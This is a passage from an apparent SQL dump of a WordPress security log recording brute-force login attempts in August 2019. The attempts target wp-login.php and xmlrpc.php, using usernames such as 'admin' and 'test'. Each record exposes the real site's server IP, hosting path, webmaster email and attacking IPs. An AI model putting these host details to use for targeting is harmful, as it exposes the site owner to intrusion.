empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"69.64.34.242\";s:11:\"REMOTE_PORT\";s:5:\"60450\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNYUboUwst7QvA2tJFRagAAAUU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566791761.1442\";s:12:\"REQUEST_TIME\";s:10:\"1566791761\";}}','notice','2019-08-26 03:56:03','2019-08-26 03:56:01',17682080,19173688,'https://bintara.com.my/wp-login.php',1,0,'69.64.34.242'),(23022,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"47.92.103.166\";s:11:\"REMOTE_PORT\";s:5:\"61067\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNZb7Luw7edOKpgf7BuGgAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566792047.6882\";s:12:\"REQUEST_TIME\";s:10:\"1566792047\";}}','notice','2019-08-26 04:00:49','2019-08-26 04:00:48',17683688,19174872,'https://bintara.com.my/wp-login.php',1,0,'47.92.103.166'),(23023,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"47.92.103.166\";s:11:\"REMOTE_PORT\";s:5:\"63993\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNZcrLuw7edOKpgf7BuGwAAAII\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566792050.3924\";s:12:\"REQUEST_TIME\";s:10:\"1566792050\";}}','notice','2019-08-26 04:00:51','2019-08-26 04:00:50',18202064,19498296,'https://bintara.com.my/xmlrpc.php',1,0,'47.92.103.166'),(23024,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"164.68.109.233\";s:11:\"REMOTE_PORT\";s:5:\"54532\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNahLoUwst7QvA2tJFTIAAAAUM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566792325.0736\";s:12:\"REQUEST_TIME\";s:10:\"1566792325\";}}','notice','2019-08-26 04:05:26','2019-08-26 04:05:25',17684792,19176032,'https://bintara.com.my/wp-login.php',1,0,'164.68.109.233'),(23025,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"133.18.198.115\";s:11:\"REMOTE_PORT\";s:5:\"35538\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNbY7Luw7edOKpgf7BuYAAAAI4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566792547.1483\";s:12:\"REQUEST_TIME\";s:10:\"1566792547\";}}','notice','2019-08-26 04:09:08','2019-08-26 04:09:07',17683592,19173808,'https://bintara.com.my/wp-login.php',1,0,'133.18.198.115'),(23026,0,'brute_force','invalid-login::username-test','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:4:\"test\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"472\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"133.18.198.115\";s:11:\"REMOTE_PORT\";s:5:\"36048\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNbZroUwst7QvA2tJFT@wAAAU8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566792550.3278\";s:12:\"REQUEST_TIME\";s:10:\"1566792550\";}}','notice','2019-08-26 04:09:12','2019-08-26 04:09:10',18200712,19498040,'https://bintara.com.my/xmlrpc.php',1,0,'133.18.198.115'),(23027,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"188.166.22.221\";s:11:\"REMOTE_PORT\";s:5:\"41561\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNcRrLuw7edOKpgf7BuhQAAAIE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566792774.2664\";s:12:\"REQUEST_TIME\";s:10:\"1566792774\";}}','notice','2019-08-26 04:12:55','2019-08-26 04:12:54',17683080,19174336,'https://bintara.com.my/wp-login.php',1,0,'188.166.22.221'),(23028,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"188.166.22.221\";s:11:\"REMOTE_PORT\";s:5:\"41854\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNcSboUwst7QvA2tJFUewAAAUw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566792777.8901\";s:12:\"REQUEST_TIME\";s:10:\"1566792777\";}}','notice','2019-08-26 04:12:59','2019-08-26 04:12:58',18200320,19500128,'https://bintara.com.my/xmlrpc.php',1,0,'188.166.22.221'),(23029,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.164.141.55\";s:11:\"REMOTE_PORT\";s:4:\"9665\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNdnLoUwst7QvA2tJFVigAAAUI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566793116.187\";s:12:\"REQUEST_TIME\";s:10:\"1566793116\";}}','notice','2019-08-26 04:18:37','2019-08-26 04:18:36',17681744,19172272,'https://bintara.com.my/wp-login.php',1,0,'46.164.141.55'),(23030,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 